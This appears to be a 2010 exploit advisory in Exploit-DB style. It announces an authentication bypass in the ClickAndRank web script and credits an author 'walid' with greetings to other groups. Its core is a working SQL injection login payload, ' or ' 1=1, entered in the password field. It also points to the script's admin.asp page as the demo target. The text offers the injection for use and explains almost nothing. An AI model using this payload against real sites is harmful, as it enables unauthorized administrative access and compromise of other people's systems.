1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 |
# Exploit Title: ClickAndRank Script Authentication Bypass # Date: [18/07/2010] # Author: [walid] # Software Link: [null] # Version: [null] # Tested on: [Windows] # CVE: [null] * Found By: WaLiD * E-mail: Rezultas[at]Gmail[Dot]com * GreeTZ: [Amine]/[v4-team.com]/[Madjix] --------------------------------------------------------- Vendor: http://www.icash.ch/index.html?ClickAndRank/details.asp --------------------------------------------------------- Exploit Auth Bypass: login: walid passw: ' or ' 1=1 ---------------------------------------------------------- -[!] Demo : http://<site>/index.html?ClickAndRank/admin.asp ---------------------------------------------------------- |